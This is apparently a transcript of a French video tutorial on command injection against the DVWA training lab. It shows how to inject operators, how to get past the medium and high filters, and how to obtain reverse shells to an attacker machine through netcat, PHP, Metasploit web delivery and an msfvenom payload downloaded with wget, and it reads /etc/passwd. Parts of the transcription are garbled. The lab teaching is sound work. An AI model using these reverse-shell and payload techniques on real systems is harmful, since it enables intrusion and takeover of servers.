Bonjour tout le monde et bienvenue sur cette nouvelle vidéo, un chapitre de commande injection ou bien du RSE. Je parle pas trop en théorie parce que quand vous avez le code source du DVWA, vous avez les liens pour lire chaque type de commande. Du coup, la documentation, c'est pas ce qui manque. Par contre, là, on travaille directement sur la pratique. Alors, commande d'injection. Là, pour vous dire, il n'y a pas de scanner que vous allez trouver quelque part pour pour chercher des vulnérabilités RCE plutôt. Ça, c'est rare de trouver. Je crois pas que vous allez en trouver déjà. Peut-être que je me trompe. Par contre, quand vous regardez par exemple un site web, vous voyez qu'il y a quelque chose qui a un lien avec le système ou qu'il va être exécuté sur le système qui héberge la page web en question. Du coup, là, ça met déjà la puce à l'oreille. Genre, j'ai un ping par ici, et je tape une adresse IP, c'est sûr que le formulaire, il va prendre le poste du formulaire, il va prendre la valeur, il va faire un ping. Si on regarde le code source, c'est clair, on voit qu'il prend la valeur post, la donne à la variable target et il fait un ping target. Du coup, nous, on peut faire un ping target et le target, il peut avoir plusieurs choses. Genre ping 127.0.0.1, mais ça finit pas là. On peut exécuter autre chose, surtout des points-virgules, des end-end et ainsi de suite. Il y a pas mal d'outils qu'on peut utiliser. Si je fais par exemple, je veux qu'il ping 127.0.0.1, parfait, submit, il va pinguer 4 fois et s'arrête. Mais moi, en tant que pentester, je veux pas qu'il s'arrête là-dessus. Je veux qu'il continue à faire mes commandes à moi. Genre, je lui demande, attendez, j'ai fait un point virgule et ID. C'est-à-dire, c'est comme Huami. Voilà, vous avez remarqué qu'il y a une nouvelle ligne qui s'est ajoutée. L'idée de la personne qui a tapé la commande. Moi, je suis en tant que www.data, pas mal. C'est un point pour accéder au système, déjà pas mal. Alors, dès que vous avez un RCE, la première des choses à quoi on pense, c'est du bind ou bien du reverse TCP direct. Pour avoir un accès direct sur la machine, c'est comme si vous ouvrez du SSH sur la machine plutôt que de s'amuser à taper des commandes sur le web. Sur le browser web, c'est un petit peu inutile. Ça prend beaucoup de temps en plus. L'interaction n'est pas très bonne. Le mieux, c'est d'avoir un reverse shell. Par ailleurs, juste pour tester quand même, je peux faire, parce que si je fais pas une adresse IP ping sans adresse IP, il va pas s'arrêter quand même, il y a un point virgule. La première commande du ping, elle est passée en fausse, mais quand même, il y a un point virgule, c'est-à-dire que je peux faire autre chose. ID. Là, c'est plus esthétique. Je peux faire un int et ID, par exemple. And, and ID, je crois. Voilà. Non. And ID. Voilà. Ouais, and, c'est-à-dire si la première commande elle est placée en true, c'est les true, c'est-à-dire là, je suis obligé de taper la deuxième commande qui est id. C'est-à-dire si le ping il est passé OK, true, exécute la deuxième. Voilà. Ça, c'est exécuté puisque c'est true. Du coup, il exécute la deuxième. Mais si je fais directement and,
puisqu'il n'y a pas une commande, puisque le ping avant, il est false, parce qu'il n'y a pas une adresse IP, du coup, il s'arrête. Il ne continue pas l'exécution de la commande qui suit. Mais quand même, on peut faire juste id, c'est-à-dire et exécute, même chose. On peut faire, alors on a dit point virgule, on a dit and, on a dit and, mais à condition d'avoir une valeur, une variable, une adresse IP plutôt. On peut faire or id, pareil. Là, ça change. On dirait comme si pour vous, c'est comme si ça change pas. Mais là, ça change. J'ai fait check. Si vous voulez espace, id, c'est la même chose. Moi, je fais directement le truc parce que des fois, vous trouvez dans des balises dans PHP qui suppriment l'espace et tout. Et même là, puisqu'on est dans l'eau, ça va marcher. Là, si vous faites deux traits, ça veut dire c'est si la première commande est false, exécutez la deuxième. C'est le contraire de and. C'est-à-dire si je fais 927.0.0.1, false, id. Ah, il ne va pas exécuter, vous avez remarqué, parce que la première commande du ping, elle était true. Puisque c'est true, pas besoin d'exécuter la deuxième. Mais si on la met direct, c'est-à-dire la première, elle est false, il peut exécuter, du coup, il peut exécuter la deuxième. Tout court. Si vous voulez, rappelez-vous, là c'est Docker, c'est-à-dire que c'est là où est installée mon application, le DVWA. D'accord. Je vais faire du reverse shell, mais bien sûr pas de là, je suis déjà connecté en SSH. Je vais regarder si juste j'ai le NC. Bon, le NC il est installé. Vous savez, le Netcat, c'est la meilleure solution de travailler sur du reverse shell, un couteau suisse. Du coup, et pour cela, je vais vous donner un site très intéressant. Rappelez-vous, c'est revshells.com. Ce site, il est très intéressant pour vous dire. Sincèrement, donnez-moi une minute. Oh, là, c'est bon. Bon. Du reverse shell, là, je tape par exemple, regardez, il y a deux parties. Listener et le listener, c'est là. D'accord. Alors, reverse et bind, c'est quoi la différence? Bind, vous ouvrez un port sur le serveur victime et vous ouvrez un port sur le serveur victime et vous connectez direct. D'accord. Le port qui sera ouvert, il va vous donner le shell en mode plateau en argent. C'est tout simple que ça. Par contre, le reverse, vous ouvrez le port en question chez vous, sur votre machine de l'attaquante, et vous demandez à votre machine cible qu'elle se connecte vers votre machine attaquante et qu'il vous donne accès à son bash. Par contre, le bin, c'est comme du SSH direct, mais le reverse, c'est tout à fait le contraire. Alors là, j'ai tapé l'adresse IP de ma machine Kali. Je vais utiliser le port 443. Il suffit, par exemple, que je viens dans mon netcat, je tape et j'exécute directement, d'accord?
Bon, moi pour ça, là je vais ouvrir le port sur ma machine Kali déjà comme vous voyez. Je vais ouvrir le port. Alors, le port 4444. Vous pouvez ouvrir n'importe quel port. Autant qu'il n'y a pas un pare-feu qui bloque. Là, je viens d'ouvrir. C'est-à-dire que ma machine Kali, elle est en écoute sur le port 4443. Je viens sur mon serveur victime. Bien sûr, je fais point virgule. Et je lui dis, écoute, connecte-toi sur la machine 020 sur le port 4443 et moins E, c'est-à-dire tu donnes accès à Winbash. D'accord? Et submit. On va regarder si ça marche. Voilà. Connect from ma machine Kali, la machine distante. Là, vous voyez que je suis à Kali. Par contre, la machine distante, elle me répond. LS, LS. D'ailleurs, c'est la même chose. Si je faisais LS par ici, ça sera la même sortie. Là, j'ai tapé par exemple ID tout à l'heure. Il y avait www.data. Je fais la même chose. C'est la même chose. Là, c'est plus pratique. En plus, vous pouvez utiliser des payloads pour avoir le TTY. Tout simplement, vous faites. En fait, il y en a plein. Mais puisque c'est une machine Docker, il n'y a pas de Python. C'est la meilleure solution pour avoir un TTY. Là, je me contacte de Binbash et donne-moi le Binbash. Et il ne m'a pas donné le Binbash. Je me demande pourquoi. Ouais, pareil. Exit. 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 Parfait. Là, il va s'arrêter. Tout à l'heure, il tournait, mais là, il s'arrête. Quand il tourne, c'est-à-dire que la connexion est établie. Dès que vous la coupez de votre machine Kali, automatiquement, vous avez à nouveau la main sur le browser. Là, c'est juste une méthode, mais je me demande pourquoi j'avais pas le TTY. Si je veux, d'ailleurs, si j'ai pas NC installé sur ma machine victime, il y a d'autres moyens. Là, d'ailleurs, vous pouvez voir, il y en a plusieurs. Il y a du bind. Moi, je préfère me connecter directement, puisque... d'accord. Plutôt, je me connecte en reverse. C'est le plus connu. Déjà parce que reverse, vous souciez plus sur côté firewall et tout, parce que c'est la machine distance, c'est elle qui va se connecter, par exemple, sur Internet. Du coup, la plupart du temps, les firewalls, ils sont plus indulgents. Ils vérifient pas trop le trafic qui sortant. Mais l'entrant, oui. Du coup, la plupart des pentesters travaillent avec des reverses sur Internet quand on parle déjà. Il y a du PHP, par exemple, si vous voulez exécuter. S'il n'y avait pas la commande netcat installée, vous pouvez le faire en Python, en Perl, en Bash, ou en ce que vous voulez. Là, puisque je sais qu'il y a PHP installé, du coup, je peux l'utiliser quand même. J'ouvre mon port sur la machine Kali et j'exécute ma commande. Tout simple. Voilà. Encore j'ai la main. LS, même chose. Je vais tester cette fois bin bash -i.
Super, j'ai la main. Vous voyez là, je suis connecté en tant que www.data sur une machine qui s'appelle ce numéro de série. Et dans cette URL, je peux faire un ls. Voilà, tout le contenu. Je peux faire un cat etc password. Voilà. J'ai le dossier password si je veux. Je crois que c'est bon. Exit. Parfait. D'ailleurs, même ici, la plupart du temps, ce qu'ils font les gens, c'est du cat etc password. Ça, j'ai oublié de le mentionner. Vous avez votre password. D'accord. Autre méthode pour faire du reverse shell. Si rien de tout ça marche, vous pouvez utiliser du Metasploit. Ouais, le MSF Console. On peut le tester, hein, MSF Console. Il y a, il y a un module très intéressant. C'est celui-là. Du coup, bah, je lui dis use ça, d'accord. Puis je lui dis je veux travailler avec ce payloader, celui-là. Set payload, d'accord, option. Alors là j'ai quoi? Il va créer un serveur web. Il va créer un serveur web port 80. On écoute sur tous les IP localement sur Kali. Je lui dis set lhost, mon adresse IP de ma machine Kali. D'ailleurs, je ne me rappelle pas l'adresse IP exactement. C'est du 20.20. Parfait. Il me reste le target. Target, là, je sais que Python n'est pas installé sur ma machine. Il n'y a que du PHP. Du coup, je peux faire un show target et set target PHP. Je l'ai vu là. Ou bien set target 1. Enfin, je fais un option. D'accord, regardez-moi ça. Voilà. Je fais un petit run. D'accord, qu'est-ce qu'il me dit? Il me dit run the following command on the target machine. C'est simple, hein? Vous voyez, là, localement, il a ouvert le port 80-80 et il va télécharger ce payloader et l'exécuter après, qui va faire le même travail que ce qu'on a fait, c'est-à-dire, il fait la même chose, du reverse shell, mais en mode MSF Console, Metasploit. Je vais sur ma machine victime, je fais pas en virgule, je colle toute la ligne, submit, ça tourne ici, 100% la connexion est établie. Effectivement, send stage, Metaplater, parfait. La connexion, elle est établie en ce que je vois. Session. Il me dit qu'il y a une session Linux avec l'utilisateur. Show session. Non, ben non. Je peux prendre la main de la session 1. Voilà, j'y suis. Je peux faire un help. Il me dit tout ce que je peux faire, tout ce que j'ai le droit de faire. Basic kill,
il y a des commandes un petit peu. C'est comme si votre commande, votre machine victime, il est lié plus qu'un simple SSH. Parce que vous pouvez copier des fichiers localement de chez vous vers la victime directement. Il y a pas mal de trucs intéressants à faire en plus. Euh, d'accord. Je fais un ls par exemple. Là, vous voyez, c'est le même principe que tout à l'heure, hein. Je suis bien dans var machin. Et je fais du shell si je veux. Bah là, j'y suis. ls. Même principe. Je fais un petit exit si je veux. Je reviens. ls, même principe. Et en plus, si on a pas mal de commandes propres à Metasploit que vous pouvez utiliser sur votre machine victime. Et ça, c'est plus intéressant. Vous pouvez avoir des payloads pour craquer le kernel, c'est-à-dire, c'est pas du tout craquer, mais pour exploiter le kernel. Et vous êtes conscient qu'on est en WW Data. Mais on peut faire des scans avec Metasploit directement pour trouver des vulnérabilités et accéder directement au mode route sur la machine victime. D'accord. Bon, là je ferme la session. J'ai plus besoin. D'accord. Close it. Du coup, là je n'ai plus besoin. Il y a une autre méthode, c'est de créer vous-même votre... Là, vous créez votre payload, c'est comme une sorte, vous créez votre virus, quoi. C'est un rat, plutôt, qui va vous donner accès à votre machine. Il suffit de l'exécuter à chaque fois, c'est tout. D'accord? C'est comme une sorte de trojan que vous allez le créer. Alors, qu'est-ce qu'il dit là? MSC Venom-P, l'architecture, c'est du Linux 64. Il faut vérifier la machine de destination ou la machine victime, c'est du 64 au 32 dès le départ. Localhost, mon adresse IP de Kali, le port que je vais utiliser. Elf, c'est-à-dire qu'il sera exécuté, qu'il n'aura pas besoin ni de PHP, parce que la plupart du temps, il n'y a pas de Netcat installé, il n'y a pas de PHP, de Python, ou je sais pas quoi. Qu'est-ce que vous allez faire? Il faut créer votre propre payloader et le télécharger sur le serveur, puis l'exécuter. Ça, c'est bien. Alors, je vais sur DVWA, je crois qu'il est déjà là. Je crée le fichier. En attendant, je vais ouvrir un serveur web local afin que je puisse... D'accord? Ouais, là, elle est créée. Je fais un petit chmod c77 shell pour qu'il soit exécutable. Là, je fais python-m, c'est-à-dire j'ouvre en bas, j'aurai un serveur web sur le port 80. D'accord. 80. Python-m, http serveur 80. S'il est ouvert, je sais pas. Bah ouais, non. Bah, j'ai compris le truc. C'est du Python 3. Là, c'est parfait. D'accord. Et je vais faire, à votre avis, qu'est-ce que je vais faire ici? Il faut que je télécharge le script. Je fais un wget http 192.168.0.20 slash et je prends mon pas là, mais plutôt là. Submit. Là, je vais voir si ça marche ou pas, hein.
Ah non, il l'a pas copié. Pourquoi? Est-ce que le wget est installé sur ma machine? Wget. Bah ouais, il est installé. Il est bien installé chez installé quoi. Wget il est installé, c'est ça. D'accord, je suis dans ma machine. Du coup, qu'est-ce qui peut clocher wget http :// 168.0.20/shell. Je copie toute la commande, on dirait que ça va pas marcher à nouveau. Ben non. Si je fais la même chose ici, ah ouais, désolé, c'est le port. Ah ouais, c'est le port 80 000. Bon, il faut faire attention. Des fois, ça peut vous bouffer une demi-journée, vous savez pas pourquoi ça marche pas. Alors que, voilà, là j'ai mon exe. Pendant la création, je lui dis qu'il faut ouvrir le port. Là, vous voyez, il s'est connecté, la machine victime, il s'est connecté, il a téléchargé un get, un truc, NC444. Enfin, j'exécute mon script tout court. Je fais un point slash, tac, tac, point slash elf, et submit. Je trouve que c'est exécuté rapidement. Alors, qu'est-ce qui n'a pas marché dans ce cas? Ouais. Je fais un bash shell. Non plus, hein. Ok. Submit, non plus. Bon, on va tester directement. Oh là là, j'ai quitté Docker en plus. PWT. Je suis dans cette patte. C'est là. Je vais regarder ce qui se passe. J'ai shell. Bah ouais, il n'est pas en mode exec. Si je fais text chmod 777, d'accord, je fais un ls-l. Il est maintenant en mode exec. Je regarde si la connexion est toujours ouverte. Je fais là, un point virgule de départ et submit. Et ben là, boum, ça tourne. C'est-à-dire que la connexion est bien établie. Parfait. Et voilà, j'ai la main. Bouami, wdata, id, ls/root, parce que j'ai la main, des night. Et après, quand vous travaillez sur des CTF, il faut craquer, et il faut essayer de trouver une solution pour commencer depuis le low level vers le high level. C'est tout. On a assez parlé du low security. On préfère commencer la medium. Il n'y a pas vraiment grand chose à en dire. Si je vais là, je regarde la source, qu'est-ce que j'ai? Ils ont fait ils remplacent, si vous tapez end, ça se remplace directement par le vide, rien. Si vous faites point virgule, pareil. Du coup, si je fais genre
ID, ça donne rien. Et end, là, il faut faire 127.0.0.1, end, ID. Pareil, ça donne rien. Du coup, il nous reste quoi? Il nous reste faire un seul end, puisque c'est pas mentionné dans le substract. Ça marche, un seul end. Pareil, si je fais double trait ID, pareil, ça marche. Double trait, ou ami par exemple. Ouais, ça marche. Même chose. Je change vers... D'ailleurs, ce sera le même principe sur le level high. Ils disent quoi? Level high, ils vous disent qu'ils ont changé le end, point virgule, tiré. Voilà. Les pipelines, si vous avez remarqué celui-là, le pipeline, il y a un espace. Du coup, s'il est tout seul, il n'y a pas moyen qu'il sera remplacé. Du coup, si vous tapez votre commande, il faut qu'il soit lié au pipeline. C'est simple. Ben là, ça, c'est cool. Mais merci les développeurs. Vous faites et vous liez. Si vous faites espace, là j'ai fait un espace. Si je fais espace pipeline, espace ID, normalement ça fait rien. Mais il faut coller le truc. Là, ça marche. Il y a quoi encore? Qu'est-ce qu'ils ont ajouté en plus? Ah ouais, pipeline. C'est tout, hein, c'est tout. Attendez. Ah, le point virgule, ça, il existe aussi. L'apostrophe. Parfait. Bon, je crois qu'on a fait le tour, à peu près le tour. N'hésitez pas à me contacter pour la moindre remarque, c'est avec un grand plaisir. Et sachez qu'on est là pour apprendre tous, d'accord? Passez une bonne journée au chapitre prochain. Salut.